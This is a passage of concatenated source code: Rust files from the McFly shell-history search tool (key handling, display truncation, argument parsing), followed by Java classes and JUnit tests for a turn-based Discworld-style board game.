Key::Char('b') | Key::Char('e') => self.input.move_cursor(Move::BackwardWord),
Key::Char('w') => self.input.move_cursor(Move::ForwardWord),
Key::Char('0') | Key::Char('^') => self.input.move_cursor(Move::BOL),
Key::Char('$') => self.input.move_cursor(Move::EOL),
Key::Char('i') | Key::Char('a') => self.in_vim_insert_mode = true,
Key::Backspace => {
self.input.delete(Move::Backward);
self.refresh_matches();
}
Key::Delete | Key::Char('x') => {
self.input.delete(Move::Forward);
self.refresh_matches();
}
Key::Home => self.input.move_cursor(Move::BOL),
Key::End => self.input.move_cursor(Move::EOL),
Key::Char(_c) => {
}
Key::F(2) => {
if !self.matches.is_empty() {
if self.settings.delete_without_confirm {
self.delete_selection();
}else{
self.menu_mode = MenuMode::ConfirmDelete;
}
}
}
_ => {}
}
}
false
}
fn truncate_for_display(
command: &Command,
search: &str,
width: u16,
highlight_color: String,
base_color: String,
debug: bool,
) -> String {
let mut prev: usize = 0;
let debug_space = if debug { 90 } else { 0 };
let max_grapheme_length = if width > debug_space {
width - debug_space - 9
} else {
11
};
let mut out = FixedLengthGraphemeString::empty(max_grapheme_length);
if !search.is_empty() {
for (start, end) in &command.match_bounds {
if prev != *start {
out.push_grapheme_str(&command.cmd[prev..*start]);
}
out.push_str(&highlight_color);
out.push_grapheme_str(&command.cmd[*start..*end]);
out.push_str(&base_color);
prev = *end;
}
}
if prev != command.cmd.len() {
out.push_grapheme_str(&command.cmd[prev..]);
}
if debug {
out.max_grapheme_length += debug_space;
out.push_grapheme_str(" ");
out.push_str(&format!("{}", color::Fg(color::LightBlue)));
out.push_grapheme_str(format!("rnk: {:.*} ", 2, command.rank));
out.push_grapheme_str(format!("age: {:.*} ", 2, command.features.age_factor));
out.push_grapheme_str(format!("lng: {:.*} ", 2, command.features.length_factor));
out.push_grapheme_str(format!("ext: {:.*} ", 0, command.features.exit_factor));
out.push_grapheme_str(format!(
"r_ext: {:.*} ",
0, command.features.recent_failure_factor
));
out.push_grapheme_str(format!("dir: {:.*} ", 3, command.features.dir_factor));
out.push_grapheme_str(format!(
"s_dir: {:.*} ",
3, command.features.selected_dir_factor
));
out.push_grapheme_str(format!("ovlp: {:.*} ", 3, command.features.overlap_factor));
out.push_grapheme_str(format!(
"i_ovlp: {:.*} ",
3, command.features.immediate_overlap_factor
));
out.push_grapheme_str(format!(
"occ: {:.*}",
2, command.features.occurrences_factor
));
out.push_grapheme_str(format!(
"s_occ: {:.*} ",
2, command.features.selected_occurrences_factor
));
out.push_str(&base_color);
}
out.string
}
fn result_top_index(&self) -> u16 {
let (_width, height): (u16, u16) = terminal_size().unwrap();
if self.is_screen_view_bottom() {
return height - RESULTS_TOP_INDEX;
}
RESULTS_TOP_INDEX
}
fn prompt_line_index(&self) -> u16 {
let (_width, height): (u16, u16) = terminal_size().unwrap();
if self.is_screen_view_bottom() {
return height - PROMPT_LINE_INDEX;
}
PROMPT_LINE_INDEX
}
fn info_line_index(&self) -> u16 {
let (_width, height): (u16, u16) = terminal_size().unwrap();
if self.is_screen_view_bottom() {
return height;
}
INFO_LINE_INDEX
}
fn command_line_index(&self, index: i16) -> i16 {
if self.is_screen_view_bottom() {
return -index;
}
index
}
fn is_screen_view_bottom(&self) -> bool {
self.settings.interface_view == InterfaceView::Bottom
}
}
// TODO:
// Ctrl('X') + Ctrl('U') => undo
// Ctrl('X') + Ctrl('G') => abort
// Meta('c') => capitalize word
// Meta('l') => downcase word
// Meta('t') => transpose words
// Meta('u') => upcase word
// Meta('y') => yank pop
// Ctrl('r') => reverse history search
// Ctrl('s') => forward history search
// Ctrl('t') => transpose characters
// Ctrl('q') | Ctrl('v') => quoted insert
// Ctrl('y') => yank
// Ctrl('_') => undo
<file_sep>/src/settings.rs
use crate::shell_history;
use clap::AppSettings;
use clap::{crate_authors, crate_version, value_t};
use clap::{App, Arg, SubCommand};
use dirs::home_dir;
use std::env;
use std::path::PathBuf;
use std::str::FromStr;
use std::time::SystemTime;
use std::time::UNIX_EPOCH;
#[derive(Debug)]
pub enum Mode {
Add,
Search,
Train,
Move,
Init,
}
#[derive(Debug)]
pub enum KeyScheme {
Emacs,
Vim,
}
#[derive(Debug)]
pub enum InitMode {
Bash,
Zsh,
Fish,
}
#[derive(Debug, PartialEq)]
pub enum InterfaceView {
Top,
Bottom,
}
#[derive(Debug)]
pub enum ResultSort {
Rank,
LastRun,
}
#[derive(Debug, Clone, Copy)]
pub enum HistoryFormat {
/// bash format - commands in plain text, one per line, with multi-line commands joined.
/// HISTTIMEFORMAT is assumed to be empty.
Bash,
/// zsh format - commands in plain text, with multiline commands on multiple lines.
/// McFly does not currently handle joining these lines; they're treated as separate commands.
/// If --zsh-extended-history was given, `extended_history` will be true, and we'll strip the
/// timestamp from the beginning of each command.
Zsh { extended_history: bool },
/// fish's pseudo-yaml, with commands stored as 'cmd' with multiple lines joined into one with
/// '\n', and with timestamps stored as 'when'. ('paths' is ignored.)
/// (Some discussion of changing format: https://github.com/fish-shell/fish-shell/pull/6493)
Fish,
}
#[derive(Debug)]
pub struct Settings {
pub mode: Mode,
pub debug: bool,
pub fuzzy: i16,
pub session_id: String,
pub mcfly_history: PathBuf,
pub output_selection: Option<String>,
pub command: String,
pub dir: String,
pub results: u16,
pub when_run: Option<i64>,
pub exit_code: Option<i32>,
pub old_dir: Option<String>,
pub append_to_histfile: bool,
pub refresh_training_cache: bool,
pub lightmode: bool,
pub key_scheme: KeyScheme,
pub history_format: HistoryFormat,
pub limit: Option<i64>,
pub skip_environment_check: bool,
pub init_mode: InitMode,
pub delete_without_confirm: bool,
pub interface_view: InterfaceView,
pub result_sort: ResultSort,
pub disable_menu: bool,
}
impl Default for Settings {
fn default() -> Settings {
Settings {
mode: Mode::Add,
output_selection: None,
command: String::new(),
session_id: String::new(),
mcfly_history: PathBuf::new(),
dir: String::new(),
results: 10,
when_run: None,
exit_code: None,
old_dir: None,
refresh_training_cache: false,
append_to_histfile: false,
debug: false,
fuzzy: 0,
lightmode: false,
key_scheme: KeyScheme::Emacs,
history_format: HistoryFormat::Bash,
limit: None,
skip_environment_check: false,
init_mode: InitMode::Bash,
delete_without_confirm: false,
interface_view: InterfaceView::Top,
result_sort: ResultSort::Rank,
disable_menu: false,
}
}
}
impl Settings {
pub fn parse_args() -> Settings {
let matches = App::new("McFly")
.version(crate_version!())
.author(crate_authors!())
.about("Fly through your shell history")
.setting(AppSettings::SubcommandRequiredElseHelp)
.arg(Arg::with_name("debug")
.short("d")
.long("debug")
.help("Debug"))
.arg(Arg::with_name("session_id")
.long("session_id")
.help("Session ID to record or search under (defaults to $MCFLY_SESSION_ID)")
.value_name("SESSION_ID")
.takes_value(true))
.arg(Arg::with_name("mcfly_history")
.long("mcfly_history")
.help("Shell history file to read from when adding or searching (defaults to $MCFLY_HISTORY)")
.value_name("MCFLY_HISTORY")
.takes_value(true))
.arg(Arg::with_name("history_format")
.long("history_format")
.help("Shell history file format, 'bash', 'zsh', 'zsh-extended' or 'fish' (defaults to 'bash')")
.value_name("FORMAT")
.takes_value(true))
.subcommand(SubCommand::with_name("add")
.about("Add commands to the history")
.aliases(&["a"])
.arg(Arg::with_name("exit")
.short("e")
.long("exit")
.value_name("EXIT_CODE")
.help("Exit code of command")
.takes_value(true))
.arg(Arg::with_name("append_to_histfile")
.long("append-to-histfile")
.help("Also append new history to $HISTFILE/$MCFLY_HISTFILE (e.q., .bash_history)"))
.arg(Arg::with_name("when")
.short("w")
.long("when")
.value_name("UNIX_EPOCH")
.help("The time that the command was run (default now)")
.takes_value(true))
.arg(Arg::with_name("directory")
.short("d")
.long("dir")
.value_name("PATH")
.help("Directory where command was run (default $PWD)")
.takes_value(true))
.arg(Arg::with_name("old_directory")
.short("o")
.long("old-dir")
.value_name("PATH")
.help("The previous directory the user was in before running the command (default $OLDPWD)")
.takes_value(true))
.arg(Arg::with_name("command")
.help("The command that was run (default last line of $MCFLY_HISTORY file)")
.value_name("COMMAND")
.multiple(true)
.required(false)
.index(1)))
.subcommand(SubCommand::with_name("search")
.about("Search the history")
.aliases(&["s"])
.arg(Arg::with_name("directory")
.short("d")
.long("dir")
.value_name("PATH")
.help("Directory where command was run")
.takes_value(true))
.arg(Arg::with_name("results")
.short("r")
.long("results")
.value_name("NUMBER")
.help("Number of results to return")
.takes_value(true))
.arg(Arg::with_name("fuzzy")
.short("f")
.long("fuzzy")
.help("Fuzzy-find results. 0 is off; higher numbers weight shorter/earlier matches more. Try 2"))
.arg(Arg::with_name("delete_without_confirm")
.long("delete_without_confirm")
.help("Delete entry without confirm"))
.arg(Arg::with_name("output_selection")
.short("o")
.long("output-selection")
.value_name("PATH")
.help("Write results to file, including selection mode, new commandline, and any shell-specific requests")
.takes_value(true))
.arg(Arg::with_name("command")
.help("The command search term(s)")
.value_name("COMMAND")
.multiple(true)
.required(false)
.index(1)))
.subcommand(SubCommand::with_name("move")
.about("Record a directory having been moved; moves command records from the old path to the new one")
.arg(Arg::with_name("old_dir_path")
.help("The old directory path")
.value_name("OLD_DIR_PATH")
.multiple(false)
.required(true)
.index(1))
.arg(Arg::with_name("new_dir_path")
.help("The new directory path")
.value_name("NEW_DIR_PATH")
.multiple(false)
.required(true)
.index(2)))
.subcommand(SubCommand::with_name("train")
.about("Train the suggestion engine (developer tool)")
.arg(Arg::with_name("refresh_cache")
.short("r")
.long("refresh_cache")
.help("Directory where command was run")
.required(false)))
.subcommand(SubCommand::with_name("init")
.about("Prints the shell code used to execute mcfly")
.arg(Arg::with_name("shell")
.help("Shell to init — one of bash, zsh, or fish")
.possible_values(&["bash", "zsh", "fish"])
.required(true))
)
.get_matches();
let mut settings = Settings::default();
if matches.is_present("init") {
settings.skip_environment_check = true;
}
settings.debug = matches.is_present("debug") || env::var("MCFLY_DEBUG").is_ok();
settings.limit = env::var("MCFLY_HISTORY_LIMIT")
.ok()
.and_then(|o| o.parse::<i64>().ok());
settings.interface_view = match env::var("MCFLY_INTERFACE_VIEW") {
Ok(val) => match val.as_str() {
"TOP" => InterfaceView::Top,
"BOTTOM" => InterfaceView::Bottom,
_ => InterfaceView::Top,
},
_ => InterfaceView::Top,
};
settings.result_sort = match env::var("MCFLY_RESULTS_SORT") {
Ok(val) => match val.as_str() {
"RANK" => ResultSort::Rank,
"LAST_RUN" => ResultSort::LastRun,
_ => ResultSort::Rank,
},
_ => ResultSort::Rank,
};
settings.session_id = matches
.value_of("session_id")
.map(|s| s.to_string())
.unwrap_or_else( ||
env::var("MCFLY_SESSION_ID")
.unwrap_or_else(|err| {
if !settings.skip_environment_check
{
panic!(
"McFly error: Please ensure that MCFLY_SESSION_ID contains a random session ID ({})",
err)
}
else {
std::string::String::new()
}
}));
settings.mcfly_history = PathBuf::from(
matches
.value_of("mcfly_history")
.map(|s| s.to_string())
.unwrap_or_else(|| {
env::var("MCFLY_HISTORY").unwrap_or_else(|err| {
if !settings.skip_environment_check {
panic!(
"McFly error: Please ensure that MCFLY_HISTORY is set ({})",
err
)
} else {
std::string::String::new()
}
})
}),
);
settings.history_format = match matches.value_of("history_format") {
None => HistoryFormat::Bash,
Some("bash") => HistoryFormat::Bash,
Some("zsh") => HistoryFormat::Zsh {
extended_history: false,
},
Some("zsh-extended") => HistoryFormat::Zsh {
extended_history: true,
},
Some("fish") => HistoryFormat::Fish,
Some(format) => panic!("McFly error: unknown history format '{}'", format),
};
match matches.subcommand() {
("add", Some(add_matches)) => {
settings.mode = Mode::Add;
settings.when_run = Some(
value_t!(add_matches, "when", i64).unwrap_or(
SystemTime::now()
.duration_since(UNIX_EPOCH)
.unwrap_or_else(|err| {
panic!("McFly error: Time went backwards ({})", err)
})
.as_secs() as i64,
),
);
settings.append_to_histfile = add_matches.is_present("append_to_histfile");
if add_matches.value_of("exit").is_some() {
settings.exit_code =
Some(value_t!(add_matches, "exit", i32).unwrap_or_else(|e| e.exit()));
}
if let Some(dir) = add_matches.value_of("directory") {
settings.dir = dir.to_string();
} else {
settings.dir = env::var("PWD").unwrap_or_else(|err| {
panic!(
"McFly error: Unable to determine current directory ({})",
err
)
});
}
if let Some(old_dir) = add_matches.value_of("old_directory") {
settings.old_dir = Some(old_dir.to_string());
} else {
settings.old_dir = env::var("OLDPWD").ok();
}
if let Some(commands) = add_matches.values_of("command") {
settings.command = commands.collect::<Vec<_>>().join(" ");
} else {
settings.command = shell_history::last_history_line(
&settings.mcfly_history,
settings.history_format,
)
.unwrap_or_else(String::new);
}
// CD shows PWD as the resulting directory, but we want it from the source directory.
if settings.command.starts_with("cd ")
|| settings.command.starts_with("pushd ")
|| settings.command.starts_with("j ")
{
settings.dir = settings.old_dir.to_owned().unwrap_or(settings.dir);
}
}
("search", Some(search_matches)) => {
settings.mode = Mode::Search;
if let Some(dir) = search_matches.value_of("directory") {
settings.dir = dir.to_string();
} else {
settings.dir = env::var("PWD").unwrap_or_else(|err| {
panic!(
"McFly error: Unable to determine current directory ({})",
err
)
});
}
if let Ok(results) = env::var("MCFLY_RESULTS") {
if let Ok(results) = u16::from_str(&results) {
settings.results = results;
}
}
if let Ok(results) = value_t!(search_matches.value_of("results"), u16) {
settings.results = results;
}
if let Ok(fuzzy) = env::var("MCFLY_FUZZY") {
if let Ok(fuzzy) = i16::from_str(&fuzzy) {
settings.fuzzy = fuzzy;
} else if fuzzy.to_lowercase() != "false" {
settings.fuzzy = 2;
}
}
if let Ok(fuzzy) = value_t!(search_matches.value_of("fuzzy"), i16) {
settings.fuzzy = fuzzy;
} else if search_matches.is_present("fuzzy") {
settings.fuzzy = 2;
}
settings.delete_without_confirm = search_matches
.is_present("delete_without_confirm")
|| env::var("MCFLY_DELETE_WITHOUT_CONFIRM").is_ok();
settings.output_selection = search_matches
.value_of("output_selection")
.map(|s| s.to_owned());
if let Some(values) = search_matches.values_of("command") {
settings.command = values.collect::<Vec<_>>().join(" ");
} else {
settings.command = shell_history::last_history_line(
&settings.mcfly_history,
settings.history_format,
)
.unwrap_or_else(String::new)
.trim_start_matches("#mcfly: ")
.trim_start_matches("#mcfly:")
.to_string();
shell_history::delete_last_history_entry_if_search(
&settings.mcfly_history,
settings.history_format,
settings.debug,
);
}
}
("train", Some(train_matches)) => {
settings.mode = Mode::Train;
settings.refresh_training_cache = train_matches.is_present("refresh_cache");
}
("move", Some(move_matches)) => {
settings.mode = Mode::Move;
settings.old_dir = Some(String::from(
move_matches
.value_of("old_dir_path")
.unwrap_or_else(|| panic!("McFly error: Expected value for old_dir_path")),
));
settings.dir = String::from(
move_matches
.value_of("new_dir_path")
.unwrap_or_else(|| panic!("McFly error: Expected value for new_dir_path")),
);
}
("init", Some(init_matches)) => {
settings.mode = Mode::Init;
match init_matches.value_of("shell").unwrap() {
"bash" => {
settings.init_mode = InitMode::Bash;
}
"zsh" => {
settings.init_mode = InitMode::Zsh;
}
"fish" => {
settings.init_mode = InitMode::Fish;
}
_ => unreachable!(),
}
}
("", None) => println!("No subcommand was used"), // If no subcommand was used it'll match the tuple ("", None)
_ => unreachable!(), // If all subcommands are defined above, anything else is unreachable!()
}
settings.lightmode = match env::var_os("MCFLY_LIGHT") {
Some(_val) => true,
None => false,
};
settings.disable_menu = match env::var_os("MCFLY_DISABLE_MENU") {
Some(_val) => true,
None => false,
};
settings.key_scheme = match env::var("MCFLY_KEY_SCHEME").as_ref().map(String::as_ref) {
Ok("vim") => KeyScheme::Vim,
_ => KeyScheme::Emacs,
};
settings
}
pub fn mcfly_training_cache_path() -> PathBuf {
Settings::storage_dir_path().join(PathBuf::from("training-cache.v1.csv"))
}
pub fn storage_dir_path() -> PathBuf {
home_dir()
.unwrap_or_else(|| panic!("McFly error: Unable to access home directory"))
.join(PathBuf::from(".mcfly"))
}
pub fn mcfly_db_path() -> PathBuf {
Settings::storage_dir_path().join(PathBuf::from("history.db"))
}
}
| 7c18020b5135d9c5fc13b6643743a835586e41cf | [
"TOML",
"Rust",
"Shell"
] | 4 | TOML | nfultz/mcfly | 048fd43561a73f46fdb614d1efd24199811efd55 | 8b70430c845354116904b4e78539149f5ecb5f91 |
refs/heads/master | <file_sep>package ca.concordia.game.gameState;
import java.util.ArrayList;
import ca.concordia.game.main.Game;
import ca.concordia.game.model.CityCard;
import ca.concordia.game.model.Deck;
import ca.concordia.game.model.Gameboard;
import ca.concordia.game.model.GreenCard;
import ca.concordia.game.model.PersonalityCard;
import ca.concordia.game.model.Player;
import ca.concordia.game.model.Symbol;
import ca.concordia.game.util.Configuration;
public class StatePlay implements StateLike {
/**
* This player holds current instance of the player.
* It will be re-initialized with performAction - function.
*/
private Player currentPlayer;
private Game currentGame;
private Gameboard gameBoard;
private StateContext currentContext;
private ArrayList<CityCard> cityCards;
private boolean replayCityCards = false;
/**
* Controls actions for current state.
*/
@Override
public void performAction(StateContext context, Player player, Game game) {
/**
* Re-initialization of class variables
*/
currentPlayer = player;
currentGame = game;
currentContext = context;
/**
* Re-initialization of function variables.
*/
gameBoard = game.getGameBoard();
int cardNumberInPlayerHand;
boolean playAnotherCard = true;
//check winning condition at the beggining of each turn.
boolean wonGame=player.checkWinningCondition(gameBoard);
//If true then the current player wins the game!!!
if(wonGame){
PersonalityCard pCard = (PersonalityCard)player.getPersonality();
printGameWon( player, pCard );
} else{
Deck discardDeck = null;
// Display Gameboard Status.
System.out.println(gameBoard.toString());
System.out.println(player.toString());
//Get all cityCards and ask the player if he wishes to use them. A city card has to be active in order to be played.
cityCards = player.getPlayerCityCard();
replayCityCards = false;
if(cityCards.size() > 0 ) {
playCityCards();
}
// Play one of the cards, ask user for input.
while(playAnotherCard){
playAnotherCard = false;
while (true) {
System.out.println("Please enter the card number you wish to play(Select the number for 'Position in Player Hand'):");
cardNumberInPlayerHand = game.keyIn.nextInt();
if (cardNumberInPlayerHand > player.getPlayerCards().size() - 1) {
System.out.println("Incorrect input please select a number between 0 and "+ (player.getPlayerCards().size() - 1));
} else {
break;
}
}
// Get card chosen by player.
// Get the actions for the chosen card.
GreenCard chosenCard = (GreenCard) player.getPlayerCards().get(cardNumberInPlayerHand);
ArrayList<Symbol> actionSymbols = chosenCard.getActionsSymbols();
// Execute each Symbol action sequentially.
String userAwnser;
for (int i = 0; i < actionSymbols.size(); i++) {
Symbol symbol = actionSymbols.get(i);
//Print out symbol description.
System.out.println(symbol.getDescription());
//If symbol is mandatory don't ask Player if he want's to use the symbol.
if( symbol.getIsMandatory() ){
System.out.println("This action is mandatory.");
playAnotherCard = actionSymbols.get(i).useSymbol(player, game, chosenCard.getNumber());
} else {
System.out.println("Would you like to use this action(yes/no)?");
userAwnser = game.keyIn.next();
if (userAwnser.contains("y")) {
playAnotherCard=actionSymbols.get(i).useSymbol(player, game, chosenCard.getNumber());
//Display board status.
System.out.println(gameBoard.toString());
} else {
System.out.println("Action Skipped.");
}
}
}//for
//After using card. Discard it to the discard deck.
//PutCard in discardDeck.
discardDeck=game.getEspecificDeck("discard");
discardDeck.putCard(chosenCard);
boolean check=player.removePlayerCard(chosenCard);
if(check){
System.out.println("Card Was put to discard deck and removed from player's hand.");
}
/**
* Forcing the player to play other cards.
*/
if( replayCityCards == true ){
playCityCards();
}
}//while
/**
* Display board status.
* Display the players hand.
*/
game.printCurrentState();
System.out.println(gameBoard.toString());
System.out.println(player.toString());
}//if
context.setState(new StateDrawCard());
}
/**
* Return the current status.
* @return String
*/
@Override
public String getStatus() {
/**
* This status is not needed here, the static variable made it easy for unit testing
* this.Status = "Play State.";
*/
return Configuration.STATE_PLAY;
}
/**
* A function to display game won
*/
private void printGameWon( Player player, PersonalityCard pCard){
System.out.println("Player: "+player.getColor()+" with personality card:"+pCard.getName()+ " and Winning Condition: "+pCard.getWinningConditionDescription());
System.out.println("**************************************************HAS WON THE GAME*************************************************************");;
System.out.println("**************************************************HAS WON THE GAME*************************************************************");;
System.out.println("**************************************************HAS WON THE GAME*************************************************************");;
System.out.println("**************************************************HAS WON THE GAME*************************************************************");;
System.out.println("**************************************************HAS WON THE GAME*************************************************************");;
System.out.println("**************************************************HAS WON THE GAME*************************************************************");;
System.out.println("**************************************************HAS WON THE GAME*************************************************************");;
System.out.println("**************************************************HAS WON THE GAME*************************************************************");;
System.out.println("**************************************************HAS WON THE GAME*************************************************************");;
}
/**
* This function will be executed
* @return
*/
private void playCityCards(){
for(int i=0;i<cityCards.size();i++){
//check that the card is active.
if(cityCards.get(i).getIsActive()){
System.out.println("Player: "+currentPlayer.getColor()+" do you wish to use city card: "+cityCards.get(i).getName()+" with ability:"+cityCards.get(i).getAbility()+"Card Number: "+cityCards.get(i).getCardNumber());
String input = currentGame.keyIn.next();
if(input.contains("y")){
System.out.println("Executing Card...");
cityCards.get(i).useCityCard(currentPlayer, currentGame);//Use card if the player choose to use it.
replayCityCards = false;
}else{
replayCityCards = true;
}
}
}
}
}<file_sep>package ca.concordia.game.model;
import java.util.ArrayList;
import ca.concordia.game.common.common.Colors;
import ca.concordia.game.util.*;
/**
* Brown card is a type of Card.
* The brown card contains a unique number,the color brown, and array of the symbols that specify the actions that have to be followed sequentially,
* and a description of the cards especialAbility(Action) if one exits(There area cards that don't have any especial action).For a description of the
* symbol actions see the Symbol class.
* @author <NAME>
* @author <NAME>
* @author <NAME>
* @author <NAME> <NAME>
* @author <NAME>
*/
public class BrownCard extends Card {
private Colors color;
private int number;
private String name;
private ArrayList<Symbol> symbols;
private String especialAbility;
/**
* Constructor will load the contents of the card from class Cardloader, Further it will set
* and initialize all the symbols that belong to a BrownCard.
* @param i(int)
*/
public BrownCard(int cardId) {
//City Cards are always Visible!
super(false,false);
this.symbols=new ArrayList<Symbol>();
String symbolId="";//Declare as empty
boolean takeMoney = false;
int moneyIdSymbol = -1;
this.color = Colors.BROWN;
this.number = cardId;
CardLoader cardLoader = CardLoader.getInstance();
this.name = CardLoader.getInstance().nameForCard(cardId, 'B');
this.especialAbility = CardLoader.getInstance().abilityForCard(cardId, 'B');
String temp = CardLoader.getInstance().symbolsForCard(cardId, 'B' );
//check that the card has content for symbols.And that the card has symbols.
if(temp.length()>0 && !temp.equals("NO Symbols AVAILABLE")){
for(int j = 0; j < temp.length(); j++ ){
//If the last symbol was 'M' then the next character will represent the amount of money the player can take.For symbol 5(Take money from bank)
if(symbolId.equals("M")){
symbolId= Character.toString(temp.charAt(j));//Get money for player to take.
this.symbols.add( new Symbol( moneyIdSymbol,moneyIdSymbol ));
}else{
symbolId=Character.toString(temp.charAt(j));//Get Symbols ID.
takeMoney=false;
}
if(symbolId.equals("M")) {
//The symbol is of type 5(Taking money from the bank).
moneyIdSymbol=5;
takeMoney=true;
}else if(takeMoney==false && !symbolId.equals("M")) {
//The symbol has another type from 5(taking money), so add it to the symbol array.
int symbol = Integer.parseInt(symbolId);
this.symbols.add(new Symbol( symbol,-1 ));
}
}
}else{
//some cards don't have any symbols.
//System.out.println("Error the symbol Card is empty!!!!");
//Do nothing.
}
}
/**
* Getter
* @return int
*/
public int getNumber(){
return this.number;
}
/**
* Getter
* @return String
*/
public String getName(){
return this.name;
}
/**
* Getter
* @return String
*/
public String getAbility(){
return this.especialAbility.toString();
}
/**
*
* @return Colors
*/
public Colors getColor() {
return color;
}
/**
*
* @param color
*/
public void setColor(Colors color) {
this.color = color;
}
/**
*
* @return ArrayList<Symbol>
*/
public ArrayList<Symbol> getSymbols() {
return symbols;
}
/**
*
* @param symbols
*/
public void setSymbols(ArrayList<Symbol> symbols) {
this.symbols = symbols;
}
/**
*
* @return String
*/
public String getEspecialAbility() {
return especialAbility;
}
/**
*
* @param especialAbility
*/
public void setEspecialAbility(String especialAbility) {
this.especialAbility = especialAbility;
}
/**
* Setter: setNumber
* @param number
*/
public void setNumber(int number) {
this.number = number;
}
/**
* Setter: SetName
*/
public void setName(String name) {
this.name = name;
}
/**
* ToString method for BrownCard. Returns a list with the color,ID,name and description on the card.
*/
public String toString()
{
return this.color+". ID:"+this.number+" "+this.name+". Description:"+this.especialAbility;
}
}<file_sep>package ca.concordia.game.gui;
/**
* @todo Read the TileMap.tmx file and render the Map + Tiles to be used in the game
* @todo Give Controller and Game classes to interract with the board.
*
* @link http://jayskills.com/blog/2013/01/09/writing-a-tile-engine-in-javafx/
* @link http://silveiraneto.net/2009/12/19/tiled-tmx-map-loader-for-pygame/
* @link https://github.com/bjorn/tiled
* @link http://docs.oracle.com/javafx/2/canvas/jfxpub-canvas.htm
* @link http://docs.oracle.com/javase/8/javafx/graphics-tutorial/canvas.htm#JFXGR214
* @link http://docs.oracle.com/javase/8/javafx/fxml-tutorial/jfx2_x-features.htm
*
* This class draws the board on which the game is going to be played on.
* The board has two major areas:
* - Left hand-side : Map of the city(universe).
* - Right hand-side : The components of the city.
* @author <NAME>
* @author <NAME>
* @author <NAME>
* @author <NAME>
* @author <NAME>
*/
public class GameboardView {
}
<file_sep>package ca.concordia.game.gameState;
import ca.concordia.game.main.Game;
import ca.concordia.game.model.Player;
/**
* Class StateContext controls the starting state of a player and helps serialize the states a player will have troughout the game.
* <pre>
* All players start in the "waiting status"
* Once a player's turns is up, the Status changes from "waiting" to "playing".
* The state then continues to the "drawing card" state.
* Finally, the state goes back to the "waiting", which means it is the player's end of turn.
* </pre>
* The flow is as following:
* <pre>
* 1. Start at StateWait
* 2. Move to StatePlay
* 3. The to StateDraw
* 4. And back to StateWait
* </pre>
* @author Diego
*/
public class StateContext {
private StateLike playerState;
/**
* Constructor Starts the the player's state to wait.
*/
public StateContext() {
setState(new StateWait());
}
/**
* Setter method for the state.
* Normally only called by classes implementing the State interface.
* Further used to determined flow of states.
* @param newState the new state of this context
*/
public void setState(final StateLike newState) {
playerState = newState;
}
/**
*
* @return String
*/
public String getState()
{
return playerState.getStatus();
}
public void performAction(Player player, Game game) {
playerState.performAction(this, player, game);
}
}
<file_sep>package ca.concordia.game;
import static org.junit.Assert.*;
import org.junit.Test;
import ca.concordia.game.gameState.*;
import ca.concordia.game.util.Configuration;
public class GameUtilTest {
@Test
public void canInitializeStates(){
StatePlay statePlay = new StatePlay();
StateDrawCard stateDrawCard = new StateDrawCard();
StateWait stateWait = new StateWait();
assertTrue( "StatePlay is type of StateLike ", statePlay instanceof StateLike );
assertTrue( "StateDrawCard is type of StateLike ", stateDrawCard instanceof StateLike );
assertTrue( "StateWait is type of StateLike ", stateWait instanceof StateLike );
assertEquals("StatePlay has Playing status", statePlay.getStatus(), Configuration.STATE_PLAY);
assertEquals("StateDrawingCard has Drawing status", stateDrawCard.getStatus(), Configuration.STATE_DRAWING);
assertEquals("StateWait has waiting status", stateWait.getStatus(), Configuration.STATE_WAIT);
}
}<file_sep>package ca.concordia.game;
import static org.junit.Assert.*;
import java.awt.Color;
import org.junit.After;
import org.junit.AfterClass;
import org.junit.Before;
import org.junit.BeforeClass;
import org.junit.Test;
import java.util.ArrayList;
import ca.concordia.game.common.common.Colors;
import ca.concordia.game.main.*;
import ca.concordia.game.model.*;
import ca.concordia.game.util.Configuration;
/**
* The Player will evaluate the winning condition
* 1. Each player must be given $10, 6 building pieces and 12 minions.
* 2. The Player cards must be shuffled (the green-bordered cards and the brown-bordered cards must be shuffled independently, and then combined into a single deck with the green-bordered on top).
* 3. The Personality cards must be shuffled.
* 4. The Random Event cards must be shuffled.
* 5. One Personality card and five (green-bordered) Player cards must be dealt to each player.
* 6. Each player must place one minion in area 1 (Dolly Sisters), area 5 (The Scours) and area 7 (The Shades).
* 7. A trouble marker must be placed in each of the same three areas.
*/
public class PlayerTest {
Game game;
Gameboard gameboard;
Player dpizar;
Player gamest;
/**
* Adding areas to play against
*/
Area dollySisters;
Area theScours;
Area theShades;
int MINIONS = 12;
int MONEY = 10;
int BUILDINGS = 6;
@BeforeClass
public static void setup(){
}
@Before
public void starts(){
game = Game.getInstance();
/**
* Initiaalization of areas
*/
int demon = 0;
Colors buildingColor = Colors.BLUE;
boolean building = false;
boolean troubleMarker = true;
//creating the areas
dollySisters = new Area(new CityCard(1), troubleMarker, buildingColor, demon, 0);
theScours = new Area(new CityCard(5), troubleMarker, buildingColor, demon, 0);
theShades = new Area(new CityCard(7), troubleMarker, buildingColor, demon, 0);
//creating cards
PersonalityCard lordVetinari = new PersonalityCard(0, 2);
PersonalityCard lordSelachii = new PersonalityCard(1, 2);
dpizar = new Player( lordVetinari, Colors.GREEN, MINIONS, BUILDINGS);
gamest = new Player( lordSelachii, Colors.GREEN, MINIONS, BUILDINGS);
/**
* @todo - load game players by assigning them via a function rather than a console on terminal
* game.init();
*/
Player[] players = new Player[]{ dpizar, gamest };
gameboard = new Gameboard( players );
}
@Test
public void playerInitialState(){
assertEquals( "10 bucks in bank", dpizar.calculateNetWorth(gameboard), gamest.calculateNetWorth(gameboard) );
gamest.addMoney(MONEY);
assertTrue( gamest.getMoney() == MONEY );
dpizar.addMoney(MONEY);
assertTrue( dpizar.getMoney() == MONEY );
assertTrue("Player dpizar has minion in Dolly Sisters(1)", dpizar.putNewMinionOnBoard(1,false) );
assertTrue("Player dpizar has minion in The Scours(5)", dpizar.putNewMinionOnBoard(5,false) );
assertTrue("Player dpizar has minion in The Shades(7)", dpizar.putNewMinionOnBoard(7,false) );
assertTrue("Player gamest has minion in Dolly Sisters(1)", gamest.putNewMinionOnBoard(1,false) );
assertTrue("Player gamest has minion in The Scours(5)", gamest.putNewMinionOnBoard(5,false) );
assertTrue("Player gamest has minion in The Shades(7)", gamest.putNewMinionOnBoard(7,false) );
//three regions have to have a trouble marker
assertTrue("Dolly Sisters has a trouble marker", dollySisters.getTroubleMarker());
assertTrue("The Scours has a trouble marker", theScours.getTroubleMarker());
assertTrue("The Shades has a trouble marker", theShades.getTroubleMarker());
//
assertTrue( gamest.toString().length() > 0 );
assertTrue( dpizar.toString().length() > 0 );
assertTrue( dollySisters.toString().length() > 0 );
assertTrue( theScours.toString().length() > 0 );
